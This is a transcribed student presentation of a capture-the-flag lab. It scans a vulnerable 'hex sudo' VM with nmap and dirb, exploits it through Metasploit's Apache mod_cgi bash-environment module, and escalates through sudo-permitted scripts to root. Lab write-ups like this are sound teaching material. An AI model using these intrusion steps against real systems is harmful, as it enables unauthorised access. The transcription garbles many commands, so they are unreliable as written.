So good evening everyone. Today we are going to present about PBT problem-based task, how to capture the flag using hex sudo. So first of all, we need to open VirtualBox and we need to run two machines. First one is Kali Linux and second one is hex sudo. So once you have opened Kali Linux and hex sudo, so first of all let's see about hex sudo first. So once you open hex sudo, as you can see here, the IP address is provided within the machine itself. So the IP address for hex sudo is 192.168.56.101. Okay, so next up is after this one is hex sudo. So next up we are going to open Kali Linux, as you can see here. All right. Okay, so in Kali Linux, before we do anything, first of all, we need to actually find the IP address for Kali Linux. What IP address does Kali Linux use? So in order to find IP address for Kali Linux, we need to use the command ifconfig. First of all, we need to open a new terminal and type in ifconfig. After you type in ifconfig, press enter, and as you can see here in the inet, we have found the IP address, which is 192.168.56.102. This is the IP address for Kali Linux. So once we have found that Kali Linux IP address, once we have found out hex sudo IP address, we can continue with the steps to capture the flag. So first of all, we need to root our terminal sudo su and then type in your password Kali, and then after that it will be rooted. So after it rooted, first of all we need to type in the command of nmap -p minus space minus s capital letter V and the IP address of hex sudo, as you can see here, 192.168.56.101. So why we want to do this command is -p minus will be able to scan the full port, and minus s capital letter V is to make sure that we cover or we scan the port for the current hex sudo machine. Okay, so after we have started the scan, as you can see here, the result is popped out. So there is three open ports found out. So the first port is 21/TCP, which is filtered, and the service is FTP. The second port is 22/TCP, the state is open, and the service is SSH. And the third port is 80/TCP, the state is open, and the service is HTTP. So after we found out the three open ports, so next up we go to the second command, which is the HTTP 192.168.56.101, which is IP address for hex sudo. So why we want to use derp? Derp is a tool where we use to identify hidden files among the port that we scanned just now. So as you can see here, we have used HTTP so that it is easier for the derp tool to find out the hidden files itself. So once we have pressed enter, it will start the scan. It will scan for directory file. It will scan for all of the website and code. And then after that, the result will be found. So the founded result was 3, and it was downloaded files was 4,612.
Okay, and this is for next step. Next step is we insert the MSF console. So after we insert the MSF console and we'll show the image Metasploit, and after that we insert the SUS Apache mode CGI, and that SUS will show the matching model, which is name is check and description. And then after that we put the use exploit multi HTTP Apache mode CGI based env SF, which is we will find the file. So after that we show the option. After we put the command show the option, and we see at the rhost is empty, and we see at the targeturi empty too, and lastly we see at the lhost. So lhost have the IP address but not valid, so we need to change lhost. And first kali we need to put the command which is set lhost 192.168.56.102, which is this is for IP address, IP Kali Linux address. And next is this IP Kali Linux address for lhost. And second is set rhost for head sudo address, which is okay, and this head sudo address for second, which is rhost. So set rhost 192.168.56.101. And after we set, number 3 is set targeturi. So we put the file. After we put the file and we show option again to check the data or info we put. And firstly is rhost. Okay, the data is insert at the current setting, and then targeturi insert to, and lastly is lhost. So the information all it insert to, and then this part I will pass to Pak Izwan.
Okay, so my name is Mawar Izwan. I will continue presenting this task. So first command is exploit. We started the exploit by using the exploit command to exploit the hex sudo. So next is command is shell, and after that we use the short command, which is the id. Next, Python -c import pty.spawn /p/bar, and after that we're using a cat space/etc/issue commands, and after that we use after that command already come out the bash/4.3 $, we need to use the uname -a, and after that we use command for sudo -l, and this will come out matching the file entry for www.data on hex.org. So next we'll continue to using a command for cat/home/store/hammer.sh, and after that we are using sudo -u tor/home/store/hammer.sh, and it will hello one stop tutor, and after that just enter yes, word yes, and enter the secret message, which is the secret passphrase. We're using a bash, bash, and after that we continue to using the same command, which is a Python -c import pty/spawn/bin/bash, and after that we are using sudo /usr/sp/service, and after that it will using the next command sudo /usr/sp/service /bin/sh, and after that it will come with hashtag, and with this hashtag just enter the command cd/root and ls, and we will get the output. So the output the last command is cat proof.tsp, and this is the output for this task. So that's all for us. Thank you.